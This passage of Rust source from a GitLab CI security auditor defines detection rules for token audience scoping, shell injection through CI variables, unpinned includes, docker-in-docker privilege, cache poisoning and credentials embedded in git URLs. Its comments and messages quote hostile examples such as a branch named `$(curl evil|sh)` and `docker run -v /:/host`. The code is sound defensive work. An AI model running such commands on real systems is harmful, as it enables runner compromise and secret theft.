        // "unknown" / empty means the parser couldn't resolve an audience.
        if aud == "unknown" || aud.is_empty() {
            continue;
        }
        // Find steps that hold this identity via HasAccessTo.
        let mut consumers: Vec<NodeId> = Vec::new();
        for step in graph.nodes_of_kind(NodeKind::Step) {
            let holds = graph
                .edges_from(step.id)
                .any(|e| e.kind == EdgeKind::HasAccessTo && e.to == ident.id);
            if holds {
                consumers.push(step.id);
            }
        }
        by_aud
            .entry(aud.as_str())
            .or_default()
            .push((ident.id, consumers));
    }
    for (aud, entries) in &by_aud {
        // (b) Wildcard / suspiciously broad audience.
        let is_wildcard = *aud == "*"
            || aud.contains("/*")
            || aud.eq_ignore_ascii_case("any")
            || aud.eq_ignore_ascii_case("default");
        if is_wildcard {
            // Use the first identity node as the anchor.
            if let Some((ident_id, consumers)) = entries.first() {
                let mut nodes_involved = vec![*ident_id];
                nodes_involved.extend(consumers.iter().copied());
                findings.push(Finding {
                    severity: Severity::High,
                    category: FindingCategory::IdTokenAudienceOverscoped,
                    path: None,
                    nodes_involved,
                    message: format!(
                        "OIDC id_token audience '{aud}' is wildcard / catch-all — any cloud / Vault role bound to this audience is reachable from every job that mints the token"
                    ),
                    recommendation: Recommendation::Manual {
                        action: "Replace the wildcard `aud:` with a job- or environment-specific audience (e.g. `vault.gitlab.net/prod-deploy`, `aws-deploy-staging`). Bind the downstream role / Vault path to that exact audience so unrelated jobs can't trade the token for the same credential.".into(),
                    },
                    source: FindingSource::BuiltIn,
                    extras: FindingExtras::default(),
                });
                // A wildcard finding supersedes the shared-audience check.
                continue;
            }
        }
        // (a) Same audience reachable from MR-context AND non-MR-context steps.
        let all_consumers: Vec<NodeId> = entries
            .iter()
            .flat_map(|(_, c)| c.iter().copied())
            .collect();
        let mut has_mr = false;
        let mut has_protected = false;
        for sid in &all_consumers {
            let Some(step) = graph.node(*sid) else {
                continue;
            };
            if step.metadata.get(META_TRIGGER).map(String::as_str) == Some("merge_request") {
                has_mr = true;
            } else {
                has_protected = true;
            }
        }
        if has_mr && has_protected && !entries.is_empty() {
            // Anchor at the first identity node carrying this audience.
            let (ident_id, _) = &entries[0];
            let mut nodes_involved = vec![*ident_id];
            nodes_involved.extend(all_consumers.iter().copied());
            findings.push(Finding {
                severity: Severity::High,
                category: FindingCategory::IdTokenAudienceOverscoped,
                path: None,
                nodes_involved,
                message: format!(
                    "OIDC id_token audience '{aud}' is shared across merge_request_event jobs and protected-branch jobs — a poisoned MR can mint a token with the same audience as the production deploy and trade it for the same downstream cloud / Vault role"
                ),
                recommendation: Recommendation::Manual {
                    action: "Split audiences by trust context: declare a separate `aud:` for MR-context jobs (e.g. `…/mr-validate`) and a different `aud:` for protected-branch jobs (e.g. `…/prod-deploy`). Bind each downstream role / Vault path to the exact audience of the job that needs it.".into(),
                },
                source: FindingSource::BuiltIn,
                extras: FindingExtras::default(),
            });
        }
    }
    findings
}
/// Rule: untrusted GitLab predefined variable interpolated unquoted into a
/// shell context (`script:` / `before_script:` / `after_script:` /
/// `environment:url:`). A branch named `` $(curl evil|sh) `` then runs as
/// part of the runner.
///
/// Detection: for each Step, scan `META_SCRIPT_BODY` and `META_ENVIRONMENT_URL`
/// for any of `UNTRUSTED_GITLAB_CI_VARS` referenced via `$VAR`, `${VAR}`, or
/// `"$VAR"`/`"${VAR}"` (double-quoted — still expanded). A reference inside
/// single quotes does NOT fire. Same for `printf %q` / `${VAR@Q}` /
/// `${VAR//[^A-Za-z0-9]/}` sanitised forms.
///
/// Severity: High. Category: Injection.
pub fn untrusted_ci_var_in_shell_interpolation(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Offending variable names in first-seen order, plus the locations
        // they were found in ("script", "environment.url").
        let mut names: Vec<&str> = Vec::new();
        let mut locations: Vec<&str> = Vec::new();
        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
            for &var in UNTRUSTED_GITLAB_CI_VARS {
                if shell_body_unsafely_expands(body, var) {
                    names.push(var);
                    if !locations.contains(&"script") {
                        locations.push("script");
                    }
                }
            }
        }
        if let Some(url) = step.metadata.get(META_ENVIRONMENT_URL) {
            for &var in UNTRUSTED_GITLAB_CI_VARS {
                if url_interpolates_var(url, var) {
                    if !names.contains(&var) {
                        names.push(var);
                    }
                    if !locations.contains(&"environment.url") {
                        locations.push("environment.url");
                    }
                }
            }
        }
        if names.is_empty() {
            continue;
        }
        // Stable presentation order for the location list.
        locations.sort();
        locations.dedup();
        let where_str = locations.join(" + ");
        let names_str = names.join(", ");
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::UntrustedCiVarInShellInterpolation,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' interpolates attacker-controlled GitLab predefined variable(s) [{}] into {} without single-quote isolation — a branch / tag / commit message containing `$(...)` executes inside the runner",
                step.name, names_str, where_str
            ),
            recommendation: Recommendation::Manual {
                action: "Pass the untrusted value through the step's `variables:` / `env:` block (one variable per step), then reference it inside the script as `\"$BRANCH\"` (double-quoted is fine when the value is bound to a real shell variable, not YAML-interpolated). For commands that must include the value, sanitise with `printf %q` or `${VAR//[^A-Za-z0-9_-]/}` first. For `environment:url:`, never interpolate `$CI_COMMIT_*` directly — use a slug-only variable (`$CI_COMMIT_REF_SLUG` is sanitised by GitLab).".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Returns true if `body` contains an *unsafe* expansion of `$VAR` / `${VAR}`
/// — i.e. one that is NOT enclosed in single quotes and NOT obviously
/// sanitised. Conservative: errs on the side of flagging because the cost of
/// a false negative (RCE) dwarfs the cost of a false positive (one extra
/// review comment).
fn shell_body_unsafely_expands(body: &str, var: &str) -> bool {
    let plain = format!("${var}");
    let braced = format!("${{{var}}}");
    // Fast path: the variable never appears in the body at all.
    if !(body.contains(&plain) || body.contains(&braced)) {
        return false;
    }
    for raw in body.lines() {
        // Drop YAML list dashes and indentation; ignore blanks and comments.
        let line = raw.trim_start_matches(['-', ' ', '\t']);
        if line.is_empty() || line.starts_with('#') {
            continue;
        }
        // A recognised sanitiser anywhere on the line (`printf %q`,
        // `${VAR@Q}`, `${VAR//[^...]/}`) makes the whole line safe — the
        // check is position-independent, so it is hoisted to line level.
        let sanitised = line.contains("printf %q")
            || (line.contains("${") && (line.contains("@Q}") || line.contains("//[^")));
        if sanitised {
            continue;
        }
        // A reference is unsafe unless it sits inside a single-quoted region:
        // an odd number of `'` strictly before the position means quoted.
        let occurrences = line
            .match_indices(&plain)
            .chain(line.match_indices(&braced))
            .map(|(pos, _)| pos);
        for pos in occurrences {
            if line[..pos].matches('\'').count() % 2 == 0 {
                return true;
            }
        }
    }
    false
}
/// True when `url` contains either expansion spelling of `var`
/// (`$VAR` or `${VAR}`).
fn url_interpolates_var(url: &str, var: &str) -> bool {
    [format!("${var}"), format!("${{{var}}}")]
        .iter()
        .any(|form| url.contains(form.as_str()))
}
// ── GitLab CI rules ─────────────────────────
//
// Five rules sourced from the v0.9.0 GitLab corpus gap analysis (council
// review of 277 .gitlab-ci.yml files). Detection inputs come from metadata
// stamped by `taudit-parse-gitlab` — see `META_GITLAB_*` constants. Each rule
// is a no-op on graphs from non-GitLab parsers (the markers will simply be
// absent), so wiring all five into `run_all_rules` is safe.
/// Branch names conventionally used as the mutable default/integration ref.
/// An `include:` whose `ref:` is one of these is rewritable by anyone with
/// push access to that branch on the source repo — letting them backdoor
/// every consumer's pipeline.
const MUTABLE_BRANCH_REFS: &[&str] = &[
    "main",
    "master",
    "develop",
    "dev",
    "trunk",
    "default",
    "HEAD",
];
/// Mid-string fragments inside a `remote:` URL that betray a branch ref
/// (vs a tag or sha). GitLab raw URLs use `/-/raw/<ref>/<path>`.
///
/// Returns `Some(<ref>)` when the ref segment looks like a mutable branch,
/// and `None` for refs that are immutable by convention: full 40-hex commit
/// SHAs, `v<digit>`-prefixed tags, and dotted numeric tags like `1.2.3`.
fn remote_url_uses_branch(url: &str) -> Option<String> {
    // Look for `/-/raw/<ref>/` patterns; ref is the segment after `/-/raw/`.
    let idx = url.find("/-/raw/")?;
    let after = &url[idx + "/-/raw/".len()..];
    let ref_seg = after.split('/').next()?;
    if ref_seg.is_empty() {
        return None;
    }
    // A 40-hex string is an immutable commit SHA.
    if ref_seg.len() == 40 && ref_seg.chars().all(|c| c.is_ascii_hexdigit()) {
        return None;
    }
    // Tag conventions: `v<digit>...` (e.g. `v1.2.3`) …
    let v_tag = ref_seg.starts_with('v')
        && ref_seg
            .chars()
            .nth(1)
            .map(|c| c.is_ascii_digit())
            .unwrap_or(false);
    // … or a dotted numeric version without the `v` prefix (e.g. `1.2.3`).
    // This case was documented in the original comment but never
    // implemented, so refs like `1.2.3` were misflagged as mutable branches.
    let dotted_tag = ref_seg.contains('.') && ref_seg.chars().any(|c| c.is_ascii_digit());
    if v_tag || dotted_tag {
        return None;
    }
    // Branches are everything else.
    Some(ref_seg.to_string())
}
/// Rule: `unpinned_include_remote_or_branch_ref` (High, Supply Chain).
///
/// Top-level GitLab `include:` of a `remote:` URL pinned to a branch, a
/// `project:` whose `ref:` is a mutable branch (main/master/develop/...), or
/// an include with no `ref:` at all (defaults to HEAD on the source repo).
///
/// Skips `local:` includes (same repo — same trust boundary), `template:`
/// includes (GitLab-maintained), and `component:` includes that have an `@`
/// version pin. Reads the structured `META_GITLAB_INCLUDES` blob the parser
/// stamps on the graph.
pub fn unpinned_include_remote_or_branch_ref(graph: &AuthorityGraph) -> Vec<Finding> {
    use taudit_parse_gitlab_include_view::IncludeView;
    // No marker ⇒ graph came from a non-GitLab parser — rule is a no-op.
    let blob = match graph.metadata.get(META_GITLAB_INCLUDES) {
        Some(s) => s,
        None => return Vec::new(),
    };
    // Best-effort: a malformed blob is treated the same as no blob.
    let entries: Vec<IncludeView> = match serde_json::from_str(blob) {
        Ok(e) => e,
        Err(_) => return Vec::new(),
    };
    let mut findings = Vec::new();
    for entry in entries {
        let kind = entry.kind.as_str();
        let target = entry.target.as_str();
        let git_ref = entry.git_ref.as_str();
        match kind {
            // local / template / component — skip (or handled separately for
            // unversioned components).
            "local" | "template" => continue,
            // Components: only flagged when the `@<version>` pin is absent
            // (empty `git_ref`); a pinned component is accepted as-is.
            "component" => {
                if git_ref.is_empty() {
                    findings.push(Finding {
                        severity: Severity::High,
                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
                        path: None,
                        nodes_involved: vec![],
                        message: format!(
                            "include: component '{target}' has no version pin (no '@<version>') — owner of the component repo can rewrite every consumer's pipeline silently"
                        ),
                        recommendation: Recommendation::PinAction {
                            current: target.to_string(),
                            pinned: format!("{target}@<sha-or-tag>"),
                        },
                        source: FindingSource::BuiltIn,
                        extras: FindingExtras::default(),
                    });
                }
            }
            // Remote URL includes: flag when the `/-/raw/<ref>/` segment in
            // the URL looks like a mutable branch (see `remote_url_uses_branch`).
            "remote" => {
                if let Some(branch) = remote_url_uses_branch(target) {
                    findings.push(Finding {
                        severity: Severity::High,
                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
                        path: None,
                        nodes_involved: vec![],
                        message: format!(
                            "include: remote URL pins branch '{branch}' ({target}) — included YAML executes with consumer's CI_JOB_TOKEN and secrets; whoever controls that branch can backdoor this pipeline"
                        ),
                        recommendation: Recommendation::PinAction {
                            current: target.to_string(),
                            // Suggest the fix by rewriting the branch segment
                            // of the actual URL into a sha placeholder.
                            pinned: target.replacen(
                                &format!("/-/raw/{branch}/"),
                                "/-/raw/<full-sha>/",
                                1,
                            ),
                        },
                        source: FindingSource::BuiltIn,
                        extras: FindingExtras::default(),
                    });
                }
            }
            // Cross-project includes: flag a missing `ref:` (HEAD default)
            // or a `ref:` naming one of the well-known mutable branches.
            "project" => {
                let lower = git_ref.to_ascii_lowercase();
                let is_branch = MUTABLE_BRANCH_REFS
                    .iter()
                    .any(|b| b.eq_ignore_ascii_case(&lower));
                let missing = git_ref.is_empty();
                // Defensive guard: a 40-hex sha can never be empty or in
                // MUTABLE_BRANCH_REFS, but the exclusion is kept explicit.
                let is_sha = git_ref.len() == 40 && git_ref.chars().all(|c| c.is_ascii_hexdigit());
                if (missing || is_branch) && !is_sha {
                    let why = if missing {
                        "no `ref:` (defaults to HEAD on source project)".to_string()
                    } else {
                        format!("`ref: {git_ref}` is a mutable branch")
                    };
                    findings.push(Finding {
                        severity: Severity::High,
                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
                        path: None,
                        nodes_involved: vec![],
                        message: format!(
                            "include: project '{target}' — {why}; included YAML can redefine every job's `script:` and runs with consumer's secrets"
                        ),
                        recommendation: Recommendation::PinAction {
                            current: format!(
                                "project: {target}{}",
                                if missing {
                                    String::new()
                                } else {
                                    format!(", ref: {git_ref}")
                                }
                            ),
                            pinned: format!("project: {target}, ref: <full-commit-sha>"),
                        },
                        source: FindingSource::BuiltIn,
                        extras: FindingExtras::default(),
                    });
                }
            }
            // Unknown include kinds from newer parsers are ignored.
            _ => {}
        }
    }
    findings
}
/// Rule: `dind_service_grants_host_authority` (High, Privilege).
///
/// Flags GitLab jobs that combine a `services: [docker:*-dind]` sidecar with
/// at least one secret or identity beyond the implicit, structurally-present
/// CI_JOB_TOKEN. With the Docker socket exposed inside the job container, a
/// malicious build step can `docker run -v /:/host` and read the runner host
/// filesystem.
pub fn dind_service_grants_host_authority(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let uses_dind = matches!(
            step.metadata.get(META_GITLAB_DIND_SERVICE).map(String::as_str),
            Some("true")
        );
        if !uses_dind {
            continue;
        }
        // Collect every Secret/Identity reachable from this step via a
        // HasAccessTo edge, excluding implicit nodes: the implicit
        // CI_JOB_TOKEN exists on every job by platform design, so counting
        // it would flag every dind job and drown the signal in noise.
        let mut sensitive: Vec<String> = graph
            .edges_from(step.id)
            .filter(|edge| edge.kind == EdgeKind::HasAccessTo)
            .filter_map(|edge| graph.node(edge.to))
            .filter(|target| {
                target
                    .metadata
                    .get(META_IMPLICIT)
                    .map(|v| v != "true")
                    .unwrap_or(true)
            })
            .filter(|target| matches!(target.kind, NodeKind::Secret | NodeKind::Identity))
            .map(|target| target.name.clone())
            .collect();
        if sensitive.is_empty() {
            continue;
        }
        sensitive.sort();
        sensitive.dedup();
        // Keep the message bounded — corpora include jobs with dozens of vars.
        let preview = if sensitive.len() > 4 {
            format!(
                "{} (and {} more)",
                sensitive[..4].join(", "),
                sensitive.len() - 4
            )
        } else {
            sensitive.join(", ")
        };
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::DindServiceGrantsHostAuthority,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' uses a docker:dind service AND holds secrets [{}] — a malicious build step can `docker run -v /:/host` from inside dind and exfiltrate the runner's filesystem (other jobs' artifacts, cached creds)",
                step.name, preview
            ),
            recommendation: Recommendation::Manual {
                action: "Replace docker-in-docker with kaniko / buildah / img for image builds (no privileged sidecar required), OR isolate the dind job to a dedicated runner pool with no shared workspace and no other secrets in scope.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Substrings (case-insensitive) identifying a GitLab security scanner job,
/// matched against either the job name or an `extends:` template name.
const SCANNER_PATTERNS: &[&str] = &[
    "sast",
    "dast",
    "secret_detection",
    "secret-detection",
    "dependency_scanning",
    "dependency-scanning",
    "container_scanning",
    "container-scanning",
    "gitleaks",
    "trivy",
    "grype",
    "semgrep",
    "bandit",
    "snyk",
    "license_scanning",
    "license-scanning",
    "iac_scan",
    "iac-scan",
    "fuzz",
    "api_fuzzing",
    "api-fuzzing",
    "coverage_fuzzing",
    "coverage-fuzzing",
];
/// True when the job name — or, failing that, the `extends:` target —
/// contains one of the scanner-pattern fragments (case-insensitively).
fn step_matches_scanner(step_name: &str, extends: Option<&String>) -> bool {
    let is_scanner = |candidate: &str| {
        let lowered = candidate.to_ascii_lowercase();
        SCANNER_PATTERNS.iter().any(|pat| lowered.contains(pat))
    };
    if is_scanner(step_name) {
        return true;
    }
    extends.map(|ext| is_scanner(ext)).unwrap_or(false)
}
/// Rule: `security_job_silently_skipped` (Medium, Configuration).
///
/// A security-scanner job (matched by name or `extends:` template) carries
/// `allow_failure: true`. When the scan errors out the pipeline still goes
/// green — a silent pass is worse than no scan, because reviewers trust the
/// badge. The absence of a compensating "surface failures" `rules:` clause
/// cannot be proven statically from YAML, so every such job is flagged and
/// the recommendation guides the operator to the fix.
pub fn security_job_silently_skipped(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let tolerates_failure = matches!(
            step.metadata.get(META_GITLAB_ALLOW_FAILURE).map(String::as_str),
            Some("true")
        );
        let extends = step.metadata.get(META_GITLAB_EXTENDS);
        if !tolerates_failure || !step_matches_scanner(&step.name, extends) {
            continue;
        }
        // Note: when `extends:` is present we report it as the match source,
        // mirroring the precedence used for detection.
        let how = extends
            .map(|e| format!("matched by extends: {e}"))
            .unwrap_or_else(|| "matched by job name".to_string());
        findings.push(Finding {
            severity: Severity::Medium,
            category: FindingCategory::SecurityJobSilentlySkipped,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Security-scanner job '{}' ({how}) runs with allow_failure: true — when the scan errors out the pipeline still goes green; reviewers trust a badge that is no longer evidence",
                step.name
            ),
            recommendation: Recommendation::Manual {
                action: "Either drop `allow_failure: true` and let the scanner gate the pipeline, OR add a follow-up `rules:` clause that surfaces the failure (e.g. a stage that asserts the scan report exists and is non-empty). A scanner that fails closed is worth more than a scanner that fails silently.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Rule: `child_pipeline_trigger_inherits_authority` (Medium, Propagation).
///
/// A GitLab `trigger:` job (downstream / child pipeline) that either runs in
/// `merge_request_event` context OR is a *dynamic* child pipeline whose
/// included YAML comes from a previous job's `artifact:`. Either way,
/// untrusted input shapes a pipeline that runs with the parent project's
/// CI_JOB_TOKEN and secrets.
pub fn child_pipeline_trigger_inherits_authority(graph: &AuthorityGraph) -> Vec<Finding> {
    // Pipeline-level context: does this graph come from an MR trigger?
    let mr_context = graph
        .metadata
        .get(META_TRIGGER)
        .map(|v| v == "merge_request")
        .unwrap_or(false);
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Only trigger jobs carry this marker; everything else is skipped.
        let trigger_kind = match step.metadata.get(META_GITLAB_TRIGGER_KIND) {
            Some(k) => k.as_str(),
            None => continue,
        };
        let dynamic_child = trigger_kind == "dynamic";
        if !dynamic_child && !mr_context {
            continue;
        }
        // Both conditions can hold at once; the message lists every reason.
        let mut reasons: Vec<&str> = Vec::new();
        if dynamic_child {
            reasons.push("includes child YAML from a previous job's artifact (dynamic child pipeline — code-injection sink)");
        }
        if mr_context {
            reasons.push(
                "runs in merge_request_event context — fork code shapes the downstream pipeline",
            );
        }
        let why = reasons.join(" AND ");
        findings.push(Finding {
            severity: Severity::Medium,
            category: FindingCategory::ChildPipelineTriggerInheritsAuthority,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Trigger job '{}' {why}; the downstream pipeline inherits the parent project's CI_JOB_TOKEN and any reachable secrets",
                step.name
            ),
            recommendation: Recommendation::Manual {
                action: "For dynamic child pipelines: validate the generated YAML against a schema before triggering, or pre-stage all child pipeline files in-tree and use `include:` (static) instead of `include: artifact:`. For MR-triggered triggers: gate the downstream with `rules: if: $CI_PIPELINE_SOURCE != 'merge_request_event'` so fork PRs cannot reach it.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Heuristic: cache keys that cross trust boundaries. Returns `Some(reason)`
/// when the key is one of the dangerous shapes, `None` when the key is
/// scoped tightly enough.
///
/// Dangerous shapes: an empty/absent key (GitLab falls back to one shared
/// `default` key), a key that is exactly `$CI_JOB_NAME` (same job name on MR
/// and default-branch pipelines shares the cache), or a fully hardcoded key
/// (no `$` interpolation at all).
fn unsafe_cache_key(key: &str) -> Option<&'static str> {
    let trimmed = key.trim();
    if trimmed.is_empty() {
        // GitLab default key when none is set: `default` — same blast radius as hardcoded.
        return Some("absent (defaults to a single shared 'default' key per runner)");
    }
    // CI_JOB_NAME alone — same name across MR + main = shared key. Both the
    // bare `$VAR` and the `${VAR}` spelling are matched case-insensitively;
    // previously the brace form only matched in exact upper case, so
    // `${ci_job_name}` slipped through.
    let lowered = trimmed.to_ascii_lowercase();
    if lowered == "$ci_job_name" || lowered == "${ci_job_name}" {
        return Some(
            "`$CI_JOB_NAME` only — same name on MR and default-branch jobs share the cache",
        );
    }
    // CI_COMMIT_REF_SLUG alone — handled by caller (depends on policy).
    // Otherwise: any key without a $-interpolation is hardcoded → shared.
    if !trimmed.contains('$') {
        return Some("hardcoded — every job and every branch share the same cache");
    }
    None
}
/// Rule: `cache_key_crosses_trust_boundary` (Medium, Supply Chain).
///
/// A GitLab `cache:` declaration whose `key:` is hardcoded, `$CI_JOB_NAME`
/// only, or `$CI_COMMIT_REF_SLUG` *without* a `policy: pull` restriction.
/// Caches are stored per-runner keyed by `key:` — a poisoned MR can push a
/// malicious `node_modules/` cache that the next default-branch job
/// downloads and executes.
pub fn cache_key_crosses_trust_boundary(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Only steps the parser stamped with a cache key participate.
        let key = match step.metadata.get(META_GITLAB_CACHE_KEY) {
            Some(k) => k,
            None => continue,
        };
        let policy = step
            .metadata
            .get(META_GITLAB_CACHE_POLICY)
            .map(|s| s.as_str())
            .unwrap_or("pull-push"); // GitLab's runtime default
        // pull-only consumers cannot poison the cache — skip those
        let is_pull_only = matches!(policy, "pull");
        let trimmed = key.trim();
        // Per-ref key: $CI_COMMIT_REF_SLUG. Safe ONLY when the consuming jobs
        // restrict themselves to `policy: pull`. Without that restriction, an
        // MR job pushes a cache the next protected-branch job downloads
        // (refs are *namespaced* but not *isolated* — the same key on `main`
        // shadows over time and the runner's per-key store is shared).
        // Both `$VAR` and `${VAR}` spellings are matched case-insensitively;
        // previously the brace form only matched in exact upper case, so
        // `${ci_commit_ref_slug}` fell through to the generic key checks.
        let lowered = trimmed.to_ascii_lowercase();
        let is_ref_slug =
            lowered == "$ci_commit_ref_slug" || lowered == "${ci_commit_ref_slug}";
        if is_ref_slug {
            if !is_pull_only {
                findings.push(Finding {
                    severity: Severity::Medium,
                    category: FindingCategory::CacheKeyCrossesTrustBoundary,
                    path: None,
                    nodes_involved: vec![step.id],
                    message: format!(
                        "Step '{}' uses cache key `$CI_COMMIT_REF_SLUG` with policy `{policy}` — MR jobs can push poisoned caches that subsequent default-branch jobs restore (npm install / Maven plugin resolution executes cached artifacts)",
                        step.name
                    ),
                    recommendation: Recommendation::Manual {
                        action: "Set `policy: pull` on jobs that consume the cache from a different trust context (default-branch, protected refs), and restrict `policy: push` to a dedicated job that runs only on protected branches. Combine with `key: { files: [package-lock.json] }` so cache reuse requires identical input hashes.".into(),
                    },
                    source: FindingSource::BuiltIn,
                    extras: FindingExtras::default(),
                });
            }
            continue;
        }
        // Remaining dangerous shapes (absent, $CI_JOB_NAME-only, hardcoded)
        // are classified by the shared heuristic.
        if let Some(reason) = unsafe_cache_key(key) {
            findings.push(Finding {
                severity: Severity::Medium,
                category: FindingCategory::CacheKeyCrossesTrustBoundary,
                path: None,
                nodes_involved: vec![step.id],
                message: format!(
                    "Step '{}' has cache key `{key}` ({reason}) with policy `{policy}` — caches cross trust boundaries; an MR or fork can stage a poisoned cache that the next protected-branch job restores and executes",
                    step.name
                ),
                recommendation: Recommendation::Manual {
                    action: "Scope the cache key to inputs only an authorized run can produce, e.g. `key: { files: [package-lock.json] }` so the key changes when dependencies change, and combine with `policy: pull` on consumers in higher trust contexts.".into(),
                },
                source: FindingSource::BuiltIn,
                extras: FindingExtras::default(),
            });
        }
    }
    findings
}
/// Local view-struct mirroring `taudit_parse_gitlab::IncludeEntry` — kept here
/// so taudit-core does not depend on taudit-parse-gitlab. The two crates pass
/// data only through the JSON blob in `META_GITLAB_INCLUDES`.
mod taudit_parse_gitlab_include_view {
    use serde::Deserialize;
    /// One `include:` entry deserialized from the `META_GITLAB_INCLUDES` blob.
    #[derive(Debug, Clone, Deserialize)]
    pub struct IncludeView {
        // Include flavour; the consuming rule matches on
        // "local" | "template" | "component" | "remote" | "project".
        pub kind: String,
        // URL, project path, or component address — interpretation depends
        // on `kind`.
        pub target: String,
        // The `ref:` / `@<version>` pin; the rules treat "" as absent.
        pub git_ref: String,
    }
}
/// Rule: a CI script body constructs an HTTPS git URL with credentials
/// embedded directly in the URL (`https://user:$TOKEN@host/...`) and
/// invokes git against it (`git clone`, `git push`, `git remote set-url`,
/// `git fetch`, `git ls-remote`).
///
/// Detection: scan `META_SCRIPT_BODY` for the regex equivalent
/// `https://[^/\s'"]*:\$\{?[A-Z0-9_]*(TOKEN|PAT|PASSWORD|PASSWD|KEY|SECRET)[A-Z0-9_]*\}?@`
/// implemented byte-by-byte to keep the dependency surface minimal.
///
/// Severity: **High**. Embedded credentials persist in `.git/config`,
/// are visible to every subsequent process via `ps`/`/proc/*/cmdline`,
/// land in `GIT_TRACE` output when set, and may be uploaded as part of
/// any artifact that bundles the workspace.
pub fn pat_embedded_in_git_remote_url(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let body = match step.metadata.get(META_SCRIPT_BODY) {
            Some(b) if !b.trim().is_empty() => b,
            _ => continue,
        };
        let hits = find_credential_embedded_git_urls(body);
        if hits.is_empty() {
            continue;
        }
        // Show at most two offending URLs in the message; summarize the rest
        // so huge URL lists don't spam the logs.
        let shown = hits.len().min(2);
        let preview = hits[..shown].join(", ");
        let suffix = if hits.len() > shown {
            format!(", and {} more", hits.len() - shown)
        } else {
            String::new()
        };
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::PatEmbeddedInGitRemoteUrl,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' embeds a credential variable directly in a git remote URL ({}{}). The token value is exposed in process argv (visible to `ps`), persists in .git/config for the rest of the job, and is captured by GIT_TRACE if enabled.",
                step.name, preview, suffix
            ),
            recommendation: Recommendation::Manual {
                action: "Use a credential helper or env-var-based authentication instead of inlining the token in the URL. For GitLab CI, prefer `git -c http.extraHeader=\"PRIVATE-TOKEN: $PAT_TOKEN\" push <url>`, or set `CI_JOB_TOKEN` as the credential helper. Never construct `https://user:$TOKEN@host/...` URLs.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Find substrings in `body` that look like
/// `https://<userpart>:<token-var-ref>@host`. Returns up to 8 unique hits
/// (stable order). The token variable is required to look like a credential
/// name (TOKEN/PAT/PASSWORD/PASSWD/KEY/SECRET) — bare `$VAR` references
/// without a credential-shaped name don't fire to keep the false-positive
/// rate down.
fn find_credential_embedded_git_urls(body: &str) -> Vec<String> {
    let mut hits: Vec<String> = Vec::new();
    let bytes = body.as_bytes();
    let mut i = 0usize;
    let needle = b"https://";
    while i + needle.len() <= bytes.len() {
        if &bytes[i..i + needle.len()] != needle {
            i += 1;
            continue;
        }
        // Find the end of the URL "authority" component — terminator is the
        // next `/`, whitespace, quote, or end-of-string. All terminators are
        // ASCII, so `end` always lands on a UTF-8 char boundary.
        let mut end = i + needle.len();
        while end < bytes.len() {
            let c = bytes[end];
            if c == b'/'
                || c == b' '
                || c == b'\t'
                || c == b'\n'
                || c == b'\r'
                || c == b'"'
                || c == b'\''
                || c == b'`'
            {
                break;
            }
            end += 1;
        }
        let authority = &body[i + needle.len()..end];
        if url_authority_has_embedded_credential_var(authority) {
            // Capture the full URL up to the path delimiter for the message.
            let url = &body[i..end];
            // Truncate long URLs for display. The cut must land on a char
            // boundary: `&url[..120]` would panic if byte 120 fell inside a
            // multi-byte character (script bodies are arbitrary UTF-8), so
            // back up to the nearest boundary first.
            let url_short = if url.len() > 120 {
                let mut cut = 120;
                while !url.is_char_boundary(cut) {
                    cut -= 1;
                }
                format!("{}…", &url[..cut])
            } else {
                url.to_string()
            };
            if !hits.contains(&url_short) {
                hits.push(url_short);
                if hits.len() == 8 {
                    break;
                }
            }
        }
        // Resume after the scanned authority (never moves backwards).
        i = end.max(i + 1);
    }
    hits
}
/// Decide whether a URL's authority component (everything after `https://`
/// and before the path) contains a credential-shaped variable reference of
/// the form `user:$TOKEN_NAME@host` or `user:${TOKEN_NAME}@host`.
fn url_authority_has_embedded_credential_var(authority: &str) -> bool {
    // Must contain both ':' and '@' with ':' before '@'.
    let at = match authority.find('@') {
        Some(p) => p,
        None => return false,
    };
    let userinfo = &authority[..at];
    let colon = match userinfo.find(':') {
        Some(p) => p,
        None => return false,
    };
    let pw_part = &userinfo[colon + 1..];
    if pw_part.is_empty() {
        return false;
    }
    // Strip optional `${...}` braces so we can inspect the variable name.
    let pw_inner = pw_part.trim_start_matches('$');
    let pw_inner = pw_inner.trim_start_matches('{').trim_end_matches('}');
    // Variable name must look like an env var (uppercase, digits, underscores)
    // and contain a credential-shaped fragment.
    if pw_inner.is_empty() {
        return false;
    }
    let looks_like_var = pw_inner
        .chars()
        .all(|c| c.is_ascii_uppercase() || c.is_ascii_digit() || c == '_');
    if !looks_like_var {
        return false;
    }
    const CRED_FRAGMENTS: &[&str] = &[
        "TOKEN", "PAT", "PASSWORD", "PASSWD", "KEY", "SECRET", "CRED",
    ];
